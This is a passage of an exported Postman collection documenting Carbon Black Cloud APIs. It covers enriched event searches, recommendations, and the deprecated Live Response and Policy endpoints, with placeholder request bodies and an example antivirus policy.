id=\"requirements\">Requirements</h3>\n<ul>\n<li>Endpoint Standard</li>\n<li>All API calls require an API key with appropriate permissions (see Authentication below).</li>\n</ul>\n<h2 id=\"quick-start-instructions\">Quick Start Instructions</h2>\n<h3 id=\"asynchronous-quick-start-instructions\">Asynchronous Quick Start Instructions</h3>\n<p>All Enriched Event searches follow the pattern:</p>\n<ol>\n<li>Start a search. The request follows the structure <code>POST /api/investigate/{version}/orgs/{org_key}/enriched_events/{job_type}</code> where <code>version</code> and <code>job_type</code> are specified in the request</li>\n<li>The <code>job_id</code> is returned in the response and used to retrieve results and status of the search</li>\n<li>Check the status of the search using <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-the-status-of-a-process-search-v1\">Get the Status of a Process Search</a>. (This is not intuitive, but will work.)</li>\n<li>Get the results. The request uses the following pattern: <code>GET /api/investigate/{version}/orgs/{org_key}/enriched_events/{job_type}/{job_id}</code></li>\n</ol>\n<blockquote>\n<p><strong>Note:</strong> <code>job_type</code> is one of <code>aggregation_jobs</code>, <code>search_jobs</code>, <code>facet_jobs</code> or <code>detail_jobs</code></p>\n</blockquote>\n<h2 id=\"guides--resources\">Guides &amp; Resources</h2>\n<ul>\n<li><a href=\"https://community.carbonblack.com/t5/Carbon-Black-Cloud-Knowledge/Advanced-search-tips-for-Carbon-Black-Cloud-Platform-Search/ta-p/93230\">Advanced Search Tips</a></li>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Platform Search Fields</a></li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"4d2b91bb-394d-4b5f-b6bd-e184e68951ec"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"dd70c0d7-8fdd-409b-9940-4a0acdfd95fe"}}],"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e"},{"name":"Recommendation API","item":[{"name":"Search Recommendations","id":"a62a91fd-cf03-4bf3-ace5-8c060b66a889","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"policy_type\": [\n            \"<string>\"\n        ],\n        \"status\": [\n            \"<string>\"\n        ],\n        \"hashes\": [\n            \"<string>\"\n        ]\n    },\n    \"rows\": integer,\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": integer\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/recommendation-service/v1/orgs/{{cb_org_key}}/recommendation/_search","description":"<p>Request to search and filter recommendations.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#bulk-create-approvals\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"24a0466f-c0a0-49b0-b393-ea6a01d769f2","id":"24a0466f-c0a0-49b0-b393-ea6a01d769f2","name":"Recommendation API","type":"folder"}},"urlObject":{"path":["recommendation-service","v1","orgs","{{cb_org_key}}","recommendation","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a62a91fd-cf03-4bf3-ace5-8c060b66a889"},{"name":"Recommendation Workflow","id":"6c053238-ab58-41ea-8a5a-39e7a0264c75","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"action\": \"<string>\",\n    \"comment\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/recommendation-service/v1/orgs/{{cb_org_key}}/recommendation/{{cb_recommendation_id}}/workflow","description":"<p>A request which can convert a certain Recommendation to a Reputation Override or update and reset an existing Recommendation workflow.</p>\n<p>An <code>ACCEPTED</code> or <code>REJECTED</code> Recommendation can be reverted back to the status of <code>NEW</code> using the <code>RESET</code> keyword in the <code>action</code> parameter. The <code>ref_id</code> of an <code>ACCEPTED</code> Recommendation is the <code>id</code> of the newly created Reputation Override.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>CREATE, READ, DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#update-approval\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"24a0466f-c0a0-49b0-b393-ea6a01d769f2","id":"24a0466f-c0a0-49b0-b393-ea6a01d769f2","name":"Recommendation API","type":"folder"}},"urlObject":{"path":["recommendation-service","v1","orgs","{{cb_org_key}}","recommendation","{{cb_recommendation_id}}","workflow"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6c053238-ab58-41ea-8a5a-39e7a0264c75"}],"id":"24a0466f-c0a0-49b0-b393-ea6a01d769f2","description":"<h1 id=\"recommendations\">Recommendations</h1>\n<h2 id=\"overview\">Overview</h2>\n<p>When Endpoint Standard is first deployed to an environment, Policy configurations can be tuned more quickly by accepting Carbon Black Cloud Recommendations rather than by investigating endpoint activity ad-hoc and manually configuring CBC Policies in response to that investigation.</p>\n<p>A “Recommendation” is a Reputation Override which you may choose to apply to improve your Policies' efficacy. With this API, you can get Recommendations, manage their workflow state, or apply them as a Reputation Override. The workflow of a Recommendation has 3 states - <code>NEW</code>, <code>REJECTED</code>, or <code>ACCEPTED</code>. You can take an action using the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/recommendation-api/#recommendation-workflow\">Recommendation Workflow</a> to <code>ACCEPT</code> or <code>REJECT</code> the Recommendation. The state of an <code>ACCEPTED</code> or <code>REJECTED</code> Recommendation can also be reverted to <code>NEW</code> using the <code>RESET</code> action of the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/recommendation-api/#recommendation-workflow\">Recommendation Workflow</a> request.</p>\n<h2 id=\"use-cases\">Use Cases</h2>\n<p>*   Rapidly configure a Policy tailored for your environment.\n*   New configurations can be tuned based on the system Recommendations rather than requiring manual investigation of activity in that environment</p>\n<h2 id=\"requirements\">Requirements</h2>\n<p>*   Carbon Black Cloud <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/\">Endpoint Standard</a>\n*   All API calls require an API key with appropriate permissions see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/recommendation-api/#authentication\">Authentication</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/recommendation-api/\">See more documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"b1178d49-2662-4974-892a-5d0a41ea17d2"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"6a98a3f7-fdc7-4334-a1cf-f46dd26251de"}}],"_postman_id":"24a0466f-c0a0-49b0-b393-ea6a01d769f2"},{"name":"Deprecated","item":[{"name":"⚠️ Live Response APIs 🗝","item":[{"name":"⚠️ Start a new session","event":[{"listen":"test","script":{"exec":["var data = JSON.parse(responseBody);","pm.environment.set(\"cb_lr_session_id\", data.id);"],"type":"text/javascript","id":"caaaf53f-58b8-487c-be40-a9c2bae2a9c6"}}],"id":"f01f2216-5539-4297-9244-c04f052dc68c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_device_id}}","description":"<p>All CBLR activity requires you first start a session with a device by <code>POST</code>ing to <code>/integrationServices/v3/cblr/session/&lt;device_id&gt;</code> with requested <code>device_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#start-a-new-session\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session","{{cb_device_id}}"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>OPTIONAL True/False - Blocks the response until a session is available.</p>\n","type":"text/plain"},"key":"wait","value":"true"}],"variable":[]}},"response":[],"_postman_id":"f01f2216-5539-4297-9244-c04f052dc68c"},{"name":"⚠️ Get Status of Session","id":"45b4d474-3a2c-4edb-8c5b-49c388eea0ad","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session","{{cb_lr_session_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"45b4d474-3a2c-4edb-8c5b-49c388eea0ad"},{"name":"⚠️ Close a session","id":"f90f08d8-a2a2-4862-a3dc-ece3662ca8d9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"session_id\": \"{{cb_lr_session_id}}\",\n    \"status\": \"CLOSE\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/integrationServices/v3/cblr/session","description":"<p>To close out your session, <code>PUT</code> the <code>CLOSE</code> status back to the session object.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#close-a-session\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f90f08d8-a2a2-4862-a3dc-ece3662ca8d9"},{"name":"⚠️ Establish Live Response Session","id":"c4493e9a-50e0-46d9-8a43-8e1f20173111","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"","description":"<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#establish-live-response-session\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"query":[],"variable":[]}},"response":[],"_postman_id":"c4493e9a-50e0-46d9-8a43-8e1f20173111"},{"name":"⚠️ Reset Session Timeout","id":"a3d692e2-a17a-4cf9-b578-20759d2ee56c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"","description":"<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#reset-session-timeout\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"query":[],"variable":[]}},"response":[],"_postman_id":"a3d692e2-a17a-4cf9-b578-20759d2ee56c"},{"name":"⚠️ Send Command to Endpoint","event":[{"listen":"test","script":{"exec":["var data = JSON.parse(responseBody);","pm.environment.set(\"cb_lr_command_id\", data.id);"],"type":"text/javascript","id":"17864943-539e-4332-88ed-18de3c53d2bd"}}],"id":"9e472a91-939c-4ee7-8833-c95979aaa856","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"session_id\": \"{{cb_lr_session_id}}\",\n\t\"name\": \"delete file\",\n    \"object\": {{cb_file_path}}\n}"},"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/command","description":"<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#send-command-to-endpoint\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session","{{cb_lr_session_id}}","command"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"5e2cb88d-4557-41da-8bc3-12f3d0ab75e6","name":"Process List","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"session_id\": \"{{cb_lr_session_id}}\",\n\t\"name\": \"process list\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/command"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"e2751434-5694-4126-98e3-20670975cd76","name":"Kill Process","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"session_id\": \"{{cb_lr_session_id}}\",\n\t\"name\": \"kill\",\n    \"object\": {{cb_pid}}\n}"},"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/command"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"2da354c0-0703-41a1-a464-7da66aa9b4ee","name":"Delete File","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"session_id\": \"{{cb_lr_session_id}}\",\n\t\"name\": \"delete file\",\n    \"object\": {{cb_file_path}}\n}"},"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/command"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""}],"_postman_id":"9e472a91-939c-4ee7-8833-c95979aaa856"},{"name":"⚠️ Get Status of Command","id":"e2c0158b-7dc2-4afe-8515-54c5423854ca","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/command/{{cb_lr_command_id}}","description":"<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#get-status-of-command\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session","{{cb_lr_session_id}}","command","{{cb_lr_command_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e2c0158b-7dc2-4afe-8515-54c5423854ca"},{"name":"⚠️ Get File Metadata","id":"9d6e9b21-58e0-4ea8-b0f3-ebeb88d611f9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/file/{{cb_lr_file_id}}","description":"<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#get-file-metadata\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session","{{cb_lr_session_id}}","file","{{cb_lr_file_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"9d6e9b21-58e0-4ea8-b0f3-ebeb88d611f9"},{"name":"⚠️ Get File Content","id":"1fde07f4-0e35-4c83-882c-3b6c81a8829d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/integrationServices/v3/cblr/session/{{cb_lr_session_id}}/file/{{cb_lr_file_id}}/content","description":"<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/live-response-api/#get-file-content\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":true,"source":{"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade","id":"b26f383e-f9d2-49db-ae89-717a56be4ade","name":"⚠️ Live Response APIs 🗝","type":"folder"}},"urlObject":{"path":["integrationServices","v3","cblr","session","{{cb_lr_session_id}}","file","{{cb_lr_file_id}}","content"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1fde07f4-0e35-4c83-882c-3b6c81a8829d"}],"id":"b26f383e-f9d2-49db-ae89-717a56be4ade","description":"<p><strong>This version of the Live Response API has been deprecated.</strong></p>\n<p>Please move to the updated version found in Platform APIs -&gt; Live Response APIs.</p>\n<p>Information on the v6 Live Response API (<code>appservices/v6/orgs/{org_key}/liveresponse</code>) and changes required to transition to it are on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/\">Developer Network</a>. There are very few changes required to move to the new API. The important benefit is the new API uses Custom API keys and least privilege per operation can be enforced.</p>\n<h2 id=\"original-api\">Original API</h2>\n<p>The Carbon Black Cloud Live Response feature allows security operators to collect information and take action on remote endpoints in real time. These actions include the ability to upload, download, and remove files, retrieve and remove registry entries, dump contents of physical memory, execute and terminate processes.</p>\n<p>Authentication uses the same <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication/\">AuthToken Header</a> as the Carbon Black Cloud API. Note that this deprecated version of Live Response requires the use of the <code>Live Response API</code> key type; any other key type will result in an Unauthorized error when attempting to access any Live Response API routes.</p>\n<p>The Live Response API is asynchronous; calling an API to execute a command on the remote endpoint, for example, will return immediately with a command ID. You can then poll the API using the command ID until a result status is returned.</p>\n<p>Before any commands can be sent to an endpoint, you must first establish a “session” with a device. A device with an active session will keep an open connection to the Carbon Black server for as long as the session is active. Sessions are kept alive for a timeout period and then recycled once the timeout period has expired. All Live Response command APIs require a valid session id; an error is returned if the session has not been established or has timed out.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_lr_key}}/{{cb_lr_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"9a46fb98-ad7c-406b-9d77-2a9c45f8f49b"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"42b0a1f5-8026-457d-a6f0-c7a69b79cc52"}}],"_postman_id":"b26f383e-f9d2-49db-ae89-717a56be4ade"},{"name":"Get the Enriched Events Search Status (v1)","id":"a2b22ff1-7ea1-4a12-88ef-6c3f4ff6c01f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/enriched_events/search_jobs/{{cb_job_id}}","description":"<p>Retrieves the status for an enriched events search request for a given job_id. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#get-the-enriched-events-search-status-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","enriched_events","search_jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a2b22ff1-7ea1-4a12-88ef-6c3f4ff6c01f"},{"name":"Get the Enriched Events Detail Search Status (v2)","id":"4c8d352b-510d-4e97-8a06-575cbe5e16cd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/detail_jobs/{{cb_job_id}}","description":"<blockquote>\n<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n</blockquote>\n<p>Retrieves the status for an enriched events detail request for a given job_id. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#get-the-enriched-events-detail-search-status-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","detail_jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4c8d352b-510d-4e97-8a06-575cbe5e16cd"},{"name":"⚠️ Get List of Policies","id":"8070582f-256e-4a3c-8164-02264887842b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/policy","description":"<p>Get the list of policies available in your organization. This list of policies include system policies (cannot be deleted or modified) as well as user-created policies (which can be deleted and modified). Each policy is a JSON document containing metadata about the policy and a list of rules. There is a separate rule API that can create, modify, and delete rules inside of a policy in addition to replacing the entire policy through the Policy API.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#get-list-of-policies\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8070582f-256e-4a3c-8164-02264887842b"},{"name":"⚠️ Retrieve Policy by ID","id":"2beef050-e829-4558-88cf-f8bc7cd063d1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/policy/{{cb_policy_id}}","description":"<p>Retrieve a policy object by ID. The policy object includes the policy metadata, policy details, and associated rules for the policy.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#retrieve-policy-by-id\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy","{{cb_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"2beef050-e829-4558-88cf-f8bc7cd063d1"},{"name":"⚠️ Create New Policy","id":"4a8ac2a3-1ef1-4947-93bb-fee1038c449b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"policyInfo\": {\n        \"description\": \"test policy for documentation\",\n        \"name\": \"documentation test\",\n        \"policy\": {\n            \"avSettings\": {\n                \"apc\": {\n                    \"enabled\": false,\n                    \"maxExeDelay\": 45,\n                    \"maxFileSize\": 4,\n                    \"riskLevel\": 4\n                },\n                \"features\": [\n                    {\n                        \"enabled\": false,\n                        \"name\": \"SIGNATURE_UPDATE\"\n                    },\n                    {\n                        \"enabled\": true,\n                        \"name\": \"ONACCESS_SCAN\"\n                    },\n                    {\n                        \"enabled\": true,\n                        \"name\": \"ONDEMAND_SCAN\"\n                    }\n                ],\n                \"onAccessScan\": {\n                    \"profile\": \"NORMAL\"\n                },\n                \"onDemandScan\": {\n                    \"profile\": \"NORMAL\",\n                    \"scanCdDvd\": \"AUTOSCAN\",\n                    \"scanUsb\": \"AUTOSCAN\",\n                    \"schedule\": {\n                        \"days\": null,\n                        \"rangeHours\": 0,\n                        \"recoveryScanIfMissed\": true,\n                        \"startHour\": 0\n                    }\n                },\n                \"signatureUpdate\": {\n                    \"schedule\": {\n                        \"fullIntervalHours\": 0,\n                        \"initialRandomDelayHours\": 4,\n                        \"intervalHours\": 2\n                    }\n                },\n                \"updateServers\": {\n                    \"servers\": [\n                        {\n                            \"flags\": 0,\n                            \"regId\": null,\n                            \"server\": [\n                                \"http://updates.cdc.carbonblack.io/update\"\n                            ]\n                        }\n                    ],\n                    \"serversForOffSiteDevices\": [\n                        \"http://updates.cdc.carbonblack.io/update\"\n                    ]\n                }\n            },\n            \"directoryActionRules\": [\n                {\n                    \"actions\": {\n                        \"FILE_UPLOAD\": false,\n                        \"PROTECTION\": false\n                    },\n                    \"path\": \"C:\\\\FXCM\\\\**\"\n                },\n                {\n                    \"actions\": {\n                        \"FILE_UPLOAD\": true,\n                        \"PROTECTION\": false\n                    },\n                    \"path\": \"sadf\"\n                },\n                {\n                    \"actions\": {\n                        \"FILE_UPLOAD\": true,\n                        \"PROTECTION\": false\n                    },\n                    \"path\": \"/Users/**\"\n                }\n            ],\n            \"id\": -1,\n            \"rules\": [\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 1,\n                    \"operation\": \"RUN\",\n                    \"required\": true\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": 